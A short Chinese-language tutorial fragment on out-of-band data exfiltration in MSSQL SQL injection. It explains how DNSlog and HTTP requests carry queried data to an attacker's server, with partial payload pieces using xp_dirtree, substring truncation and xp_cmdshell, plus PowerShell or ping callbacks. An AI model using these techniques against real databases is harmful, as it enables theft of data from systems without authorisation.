Dnslog与Http外带
Mssql_Dnslog外带
原理
DNSLOG解释
DNS: 域名解析IP , 用户在浏览器输入一个域名, 靠DNS服务解析域名的真实IP, 访问服务器上相应的服务
DNSLOG...所以利用解析的日志把攻击者需要的值带出, 称为数据外带,原理上只要能进行DNS请求的函数都可能存在DNSlog注入
DNSLOG利用场景
sql注入时, 存在盲注或者延时, 我们获得需要数据就会频繁请求, 最后导致IP.....xp_dirtree @a--
由于varbinary()函数只能执行出32个位字符,无法显示全部,所以需要对查询内容进行截取
使用函数: substring('条件语句',开始,结束)
构造payload...使用什么工具呢?...通过ping的方式, 让目标机访问攻击者构造的http,通过powershell 执行命令让目标机访问攻击者构造的IP
函数
DECLARE #定义变量
set #为变量赋值
master..xp_cmdshell